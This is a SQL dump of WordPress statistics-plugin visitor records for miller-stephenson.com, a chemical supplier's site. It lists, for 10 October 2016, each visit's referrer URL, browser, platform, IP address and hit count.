INSERT INTO `wp_statistics_visitor` VALUES (2244, '2016-10-10', 'https://www.google.co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&sqi=2&ved=0ahUKEwi_ypjw7c_PAhWMLMAKHTexBl8QFgg6MAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fvazo-52%2F&usg=AFQjCNFdgoJUoi3B25XK9qLqegNqbQkfzg&bvm=bv.135258522,d.bGg', 'MSIE', 'Windows', '11.0', '', '81.105.166.170', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2245, '2016-10-10', 'https://www.google.co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=9&cad=rja&uact=8&ved=0ahUKEwiO2JCP7s_PAhWOZpoKHfbdARMQFghNMAg&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fkrytox%2F&usg=AFQjCNGn7PFDgABBgpzqq7KdESkbBtph0Q', 'MSIE', 'Windows', '11.0', '', '213.137.179.49', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2246, '2016-10-10', 'https://www.google.fr/', 'Chrome', 'Windows', '53.0.2785.143', '', '132.169.182.101', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2247, '2016-10-10', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '178.19.228.31', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2248, '2016-10-10', 'https://www.google.co.za/', 'Chrome', 'Windows', '53.0.2785.143', '', '192.168.103.59', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2249, '2016-10-10', 'https://www.miller-stephenson.com', 'Opera', 'Windows', '12.16', '', '119.128.173.111', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2250, '2016-10-10', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '70.195.195.43', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2251, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '10.0.648.204', '', '209.95.186.232', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2252, '2016-10-10', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '188.6.78.127', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2253, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.5', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2254, '2016-10-10', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '115.28.111.201', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2255, '2016-10-10', 'https://www.miller-stephenson.com', 'XML-RPC', 'Unknown', 'Unknown', '', '115.28.111.201', '000', 2523, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2256, '2016-10-10', 'https://www.google.co.in/', 'Chrome', 'Windows', '53.0.2785.143', '', '182.75.169.234', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2257, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '118.212.113.184', '000', 43, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2258, '2016-10-10', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0', '', '178.55.222.22', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2259, '2016-10-10', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '217.254.233.52', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2260, '2016-10-10', 'https://r.search.yahoo.com/_ylt=A7x9UkyYbftXMxQAAr93Bwx.;_ylu=X3oDMTBydWpobjZlBHNlYwNzcgRwb3MDMQRjb2xvA2lyMgR2dGlkAw--/RV=2/RE=1476124185/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2fopteon-sion-vapor-degreasing%2f/RK=0/RS=GHjqzeqDtzJ.0_qEN2IFTByuU9E-', 'MSIE', 'Windows', '11.0', '', '213.131.162.102', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2261, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '26.0.1410.64', '', '54.87.142.110', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2262, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.196', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2263, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.87', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2264, '2016-10-10', 'https://www.google.com.ph/', 'Chrome', 'Windows', '53.0.2785.143', '', '180.191.135.75', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2265, '2016-10-10', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '86.83.134.61', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2266, '2016-10-10', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.41.243.198', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2267, '2016-10-10', 'https://www.google.com', 'Firefox', 'Windows', '44.0', '', '192.146.217.50', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2268, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '194.11.79.41', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2269, '2016-10-10', 'https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/xht-bd-series/', 'Chrome', 'Windows', '53.0.2785.143', '', '186.220.13.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2270, '2016-10-10', 'https://duckduckgo.com/', 'Opera Next', 'Windows', '36.0.2130.80', '', '5.47.154.11', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2271, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '24.0.1290.1', '', '209.128.119.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2272, '2016-10-10', 'https://www.google.es/', 'Chrome', 'Windows', '53.0.2785.116', '', '82.158.176.99', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2273, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.6', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2274, '2016-10-10', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '217.88.255.107', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2275, '2016-10-10', 'https://www.google.ie/', 'Chrome', 'Windows', '53.0.2785.116', '', '89.19.94.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2276, '2016-10-10', 'https://www.miller-stephenson.com/wp-admin/post.php?ux_builder=frontend&post_id=2311', 'Chrome', 'Windows', '53.0.2785.143', '', '24.63.154.108', '000', 2229, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2277, '2016-10-10', 'https://www.miller-stephenson.com/', 'Chrome', 'Chrome OS', '39.0.2171.96', '', '23.250.70.50', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2278, '2016-10-10', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '23.250.70.50', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2279, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '12.251.123.42', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2280, '2016-10-10', 'https://www.google.co.za/', 'Chrome', 'Windows', '53.0.2785.143', '', '196.210.64.16', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2281, '2016-10-10', 'https://www.google.com.hk/', 'Chrome', 'Windows', '45.0.2454.101', '', '116.216.129.22', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2282, '2016-10-10', 'https://www.google.fr/', 'Firefox', 'Windows', '49.0', '', '134.214.181.215', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2283, '2016-10-10', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '173.14.167.153', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2284, '2016-10-10', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.94.37.44', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2285, '2016-10-10', 'https://www.google.com.tr/', 'Chrome', 'Linux', '37.0.2062.120', '', '85.110.181.175', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2286, '2016-10-10', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '128.157.160.13', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2287, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '24.63.154.108', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2288, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.195', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2289, '2016-10-10', 'https://www.miller-stephenson.com/chemicals/solvents/opteon-solvents/', 'Safari', 'iPhone', '7.0', '', '199.30.24.179', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2290, '2016-10-10', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjBnImEntDPAhUEl34KHagYDDUYABAA&sig=AOD64_21du3S5et4C0xQabLpE3Z_LPn5gQ&rct=j&q=&ved=0ahUKEwjpgoWEntDPAhUM-GMKHRztB1EQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '192.31.242.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2291, '2016-10-10', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '12.178.8.162', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2292, '2016-10-10', 'https://www.google.com/search', 'Chrome', 'Linux', '27.0.1453', '', '24.63.154.108', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2293, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.21', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2294, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Unknown', '27.0.1453', '', '66.249.83.193', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2295, '2016-10-10', 'https://www.miller-stephenson.com/dental-handpiece-lubricant/', 'Chrome', 'Unknown', '27.0.1453', '', '66.249.83.197', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2296, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '24.63.154.108', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2297, '2016-10-10', 'https://www.google.com/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '70.88.46.5', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2298, '2016-10-10', 'https://www.mschem.com/miller/index.php', 'Chrome', 'Windows', '53.0.2785.143', '', '50.151.36.144', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2299, '2016-10-10', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '64.196.168.50', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2300, '2016-10-10', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6.3', '', '219.134.105.9', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2301, '2016-10-10', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '65.158.63.83', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2302, '2016-10-10', 'https://www.bing.com/search?q=Miller+Stephenson+MS+122AD&FORM=R5FD4', 'MSIE', 'Windows', '11.0', '', '96.89.41.109', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2303, '2016-10-10', 'https://www.google.com.pr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&sqi=2&ved=0ahUKEwjuxvm8q9DPAhXIPB4KHZggD-gQFgg3MAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-gpl-205%2F&usg=AFQjCNHwZ2VkQ2EkLZn-9yjL6I2BINcdgA&bvm=bv.135258522,d.dmo', 'MSIE', 'Windows', '11.0', '', '196.28.57.7', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2304, '2016-10-10', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.26.62.251', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2305, '2016-10-10', 'https://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1205.w0xVu0aPefmxeZ89N3nbV7wYSSH0JsAX6LTvfFIb--fq5JZNM4UcXhMJt47A1OZD.a73375291af7d83d6e669e7bb01cdaaf6da79b81&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YD4hgzqAYr5iuWBiLZQy-rY&data=UlNrNmk5WktYejR0eWJFYk1LdmtxbWg4V3VrcVZRaW5qSEV5NjF2QkhsZDhTWUNDSHQwZzhXQkktSlF5d0NvOXh6MWltUlVTSUtvbmFJNXNyUGF0RXRuNVRwNHhxTThua2h0MmJabHFkQms0b1RfVElJV3dKZ2p5RkNoeVpZemk0Y0JyQnhUWU5PeWVRaHN5VXp5OV9n&b64e=2&sign=54b353342cbcef4d405eda49c0c7cc22&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQe3IrxbPWIv48kjy2QoyatR54OdkkBv9rEiPzU1XUpn7V0pJN1zWmOhHPHVZNiR9ngG28SQPja4tKxa66OUR3r3oLggyRuA5A2PtWyHz1juJvogtnbkq6ysSgAbSmRw9pTEQiM9HKlZa&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCVLVIUOk4qiEFKg8oGO1ON4x4yiVWyvR1dw9ciPTkHZHfcZvTphdHj-zNXzv1hgNQ7XLm8tI7XxGT9XAnWwuDHjgZLPJ7hfeeA&l10n=ru&cts=1476103928994&mc=1.79008838028', 'MSIE', 'Windows', '8.0', '', '188.35.22.19', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2306, '2016-10-10', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '87.197.145.126', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2307, '2016-10-10', 'https://www.miller-stephenson.com', 'Safari', 'Linux', '538.1', '', '52.55.109.218', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2308, '2016-10-10', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '11.0.696.71', '', '10.50.50.205', '000', 29, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2309, '2016-10-10', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '11.0.696.71', '', '10.50.50.233', '000', 27, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2310, '2016-10-10', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '31.0', '', '121.200.54.98', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2311, '2016-10-10', 'https://ttsgco.blogfa.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '31.214.169.248', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2312, '2016-10-10', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.88.74.175', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2313, '2016-10-10', 'https://www.google.ca/aclk?sa=L&ai=DChcSEwio38Trr9DPAhVIO4EKHb5BBAsYABAA&sig=AOD64_22IqUi5Fo1VoYyzU0JzUlTQKpZZw&rct=j&q=&ved=0ahUKEwjDg8Lrr9DPAhVEPT4KHWkhAZEQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '216.118.213.14', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2314, '2016-10-10', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '130.75.38.72', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2315, '2016-10-10', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '72.167.183.50', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2316, '2016-10-10', 'https://www.bing.com', 'MSIE', 'Windows', '8.0', '', '208.184.112.74', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2317, '2016-10-10', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '10.0', '', '166.70.207.2', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2318, '2016-10-10', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '10.0', '', '185.100.87.183', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2319, '2016-10-10', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiisN-JstDPAhUELWkKHbX3AykYABAF&sig=AOD64_0TuGWU8Gz7yMyM0HAsia2aobpYMQ&rct=j&q=&ved=0ahUKEwi32tuJstDPAhWh44MKHZKsDVYQ0QwIOA&adurl=', 'MSIE', 'Windows', '11.0', '', '96.82.211.217', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2320, '2016-10-10', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '10.0', '', '104.131.157.171', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2321, '2016-10-10', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '10.0', '', '193.90.12.87', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2322, '2016-10-10', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '10.0', '', '104.236.58.27', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2323, '2016-10-10', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '10.0', '', '109.163.234.9', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2324, '2016-10-10', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '10.0', '', '89.187.142.208', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2325, '2016-10-10', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '10.0', '', '104.131.165.123', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2326, '2016-10-10', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '10.0', '', '171.25.193.131', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2327, '2016-10-10', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '10.0', '', '185.129.62.63', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2328, '2016-10-10', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '10.0', '', '216.17.99.183', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2329, '2016-10-10', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '10.0', '', '189.84.21.44', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2330, '2016-10-10', 'https://www.google.co.uk/', 'Chrome', 'Windows', '53.0.2785.143', '', '82.113.160.250', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2331, '2016-10-10', 'https://www.google.lv/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwihkMOTs9DPAhWEuB4KHcesCS0QFggaMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&sig2=oNcqu8wH7Q8KoaRFvkB-zQ&bvm=bv.135258522,d.dmo', 'MSIE', 'Windows', '11.0', '', '158.43.117.182', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2332, '2016-10-10', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '52.41.235.88', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2333, '2016-10-10', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '194.187.170.103', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2334, '2016-10-10', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwjDwKvKtNDPAhVKRiYKHZ_mDNEQFggrMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fms-907-two-part-epoxy-adhesive%2F&usg=AFQjCNG-RsF8ufC-UmC2iZIs3mMktO4dqg', 'MSIE', 'Windows', '11.0', '', '198.208.72.11', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2335, '2016-10-10', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '205.174.22.20', '000', 120, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2336, '2016-10-10', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '58.64.181.66', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2337, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '24.101.177.10', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2338, '2016-10-10', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '122.171.217.52', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2339, '2016-10-10', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '134.0.11.15', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2340, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '150.70.173.40', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2341, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '65.196.168.11', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2342, '2016-10-10', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '201.230.158.67', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2343, '2016-10-10', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.41.11.190', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2344, '2016-10-10', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '8.0', '', '52.71.155.178', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2345, '2016-10-10', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '141.189.251.16', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2346, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '125.209.235.177', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2347, '2016-10-10', 'https://www.miller-stephenson.com/', 'AppleWebKit', 'Windows', '537.36', '', '125.209.235.185', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2348, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '75.78.103.8', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2349, '2016-10-10', 'https://www.bing.com/search?q=miller+stephenson&qs=OS&pq=miller-ste&sc=8-10&sp=1&cvid=7BDDB7E6FC8F43F0AA54EB3162B0A107&FORM=QBLH', 'MSIE', 'Windows', '11.0', '', '207.12.134.156', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2350, '2016-10-10', 'https://www.miller-stephenson.com', 'Dalvik', 'Android', '2.1.0', '', '166.137.252.130', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2351, '2016-10-10', 'https://www.google.fr/', 'Safari', 'Macintosh', '9.1.1', '', '193.52.83.14', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2352, '2016-10-10', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiz8vX9utDPAhUBdSYKHTCvAGoQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'MSIE', 'Windows', '11.0', '', '66.192.28.227', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2353, '2016-10-10', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '23.91.71.224', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2354, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.25', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2355, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.181', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2356, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.160', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2357, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.56', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2358, '2016-10-10', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '62.2.211.142', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2359, '2016-10-10', 'https://www.miller-stephenson.com', 'Safari', 'Windows', '534.34', '', '151.138.28.21', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2360, '2016-10-10', 'https://www.miller-stephenson.com', 'Opera', 'Windows', '9.00', '', '107.170.107.176', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2361, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '23.0.1271.95', '', '54.91.16.247', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2362, '2016-10-10', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwjf7pWYvdDPAhWOZiYKHThGAboQFggkMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'MSIE', 'Windows', '11.0', '', '161.84.225.13', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2363, '2016-10-10', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.153.64.15', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2364, '2016-10-10', 'https://www.google.com/', 'Silk', 'Kindle Fire', '52.1.79', '', '216.107.184.197', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2365, '2016-10-10', 'https://www.google.gr/', 'Chrome', 'Windows', '53.0.2785.143', '', '195.170.23.130', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2366, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '59.36.241.68', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2367, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '202.105.12.220', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2368, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '120.76.172.117', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2369, '2016-10-10', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '46.135.117.26', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2370, '2016-10-10', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '7.0', '', '131.253.27.6', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2371, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '50.202.136.210', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2372, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '117.84.117.91', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2373, '2016-10-10', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&frm=1&source=web&cd=1&ved=0ahUKEwik8_SFxNDPAhVFbT4KHWC6BC0QFggxMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135258522,d.cWw', 'MSIE', 'Windows', '10.0', '', '68.15.55.160', '000', 3, 0); 
